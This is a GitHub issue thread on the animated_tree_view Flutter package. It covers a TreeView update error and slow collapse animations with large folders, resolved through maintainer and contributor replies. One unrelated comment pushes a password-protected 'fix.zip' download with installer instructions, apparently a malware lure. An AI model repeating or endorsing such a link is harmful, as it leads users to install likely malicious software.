### ISSUE TITLE
AnimatedList Performance When Handling Complex Data

### ISSUE THREAD

**Issue by jitender-kumar-dev** [embraceitmobile/animated_tree_view#53]
I am using v2.2.1.
Seeing the above error when I am trying to update the TreeView in subsequent calls. First time it works fine.

Below is the complete code

```

class _FileItemBrowseState extends State<TreeViewBrowse> {
  TreeNode<FileSystemItem>? tree;
  String expandedPath = '';
  TreeViewController? _treeViewController;

  @override
  Widget build(BuildContext context) {
    return BlocBuilder<ListFileItemsCubit, ListFilesState>(
        builder: (context, state) {
      if (state.loading || state.items.isEmpty) {
        return const SizedBox.shrink();
      }
      updateTreeView(state);
      return _treeView(state);
    });
  }

  void updateTreeView(ListFilesState state) async {
    final childNodes = state.items.map((item) {
      return TreeNode<FileSystemItem>(data: item);
    }).toList();

    if (tree == null) {
      // First call, initialise the tree
      tree = TreeNode<FileSystemItem>.root();
      tree?.addAll(childNodes);
    } else if (expandedPath.isNotEmpty) {
      // Subsequent call, just update the tree
      final parentNode = tree?.elementAt(expandedPath);
      if (parentNode is TreeNode<FileSystemItem>) {
        parentNode.addAll(childNodes);
      }
      expandedPath = '';
    }
  }

  Widget _treeView(ListFilesState state) {
    return Expanded(
      child: TreeView.simpleTyped<FileSystemItem, TreeNode<FileSystemItem>>(
          builder: (_, node) {
            final item = node.data as FileSystemItem;
            return FileItemEntry(
              item: item,
              viewMode: BrowseView.list,
              selected: false,
              onChevronIconTap: () {
                if (item is Directory) {
                  expandedPath = node.path;
                  context.read<ListFileItemsCubit>().listFiles(
                      ListFileItemsEvent(widget.state.volume, item.path));
                }
              },
            );
          },
          tree: tree!,
          showRootNode: false,
          onTreeReady: (controller) {
            _treeViewController = controller;
          }),
    );
  }
}
```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jitender-kumar-dev** [comment]
@jawwad-hassan89 Could you please help on this?

**Comment by jawwad-hassan89** [comment]
Hi @jitender-kumar-dev, I will try to look into this issue in 1-2 days, will then update you on the solution.

**Comment by jawwad-hassan89** [comment]
Please share the detailed stack trace here so that I can reproduce the issue.

**Comment by jitender-kumar-dev** [comment]
> Please share the detailed stack trace here so that I can reproduce the issue.

@jawwad-hassan89 Thanks for the prompt response. I've found the root cause for this. 
```
if (state.loading || state.items.isEmpty) {
        return const SizedBox.shrink();
      }
```

Returning a different widget from BlocBuilder was making the `_listKey.currentState` null. Returning the treeView in every case works fine and as expected. Although I am facing another issue which is as follow -

When I collapse an expanded folder which has a lot of files (5000 files), It creates some distortion on the UI while collapsing it. Possibly AnimatedList is not able to perform a smooth animation. Do this library provide something to handle so that large set of data can be collapsed gracefully ?

**Comment by cadnza** [comment]
> When I collapse an expanded folder which has a lot of files (5000 files), It creates some distortion on the UI while collapsing it. Possibly AnimatedList is not able to perform a smooth animation. Do this library provide something to handle so that large set of data can be collapsed gracefully ?

@jitender-kumar-dev Yes, I had exactly this in mind with #38, which lets you either supply an `animation` argument or suppress the animation altogether.

**Comment by cadnza** [comment]
> @cadnza Ah, I understand. However, it seems that this feature is not available in v2.2.1. Are there any plans to update the package soon?

Oh that's a question for @jawwad-hassan89—I have no idea. But while you wait, it might not be a bad idea to [reference your dependency](https://dart.dev/tools/pub/dependencies#git-packages) to #38's commit on this repo.

**Comment by jitender-kumar-dev** [comment]
@cadnza @jawwad-hassan89 Thank you for the updates. I would like to wait for the upcoming release. Closing this issue.
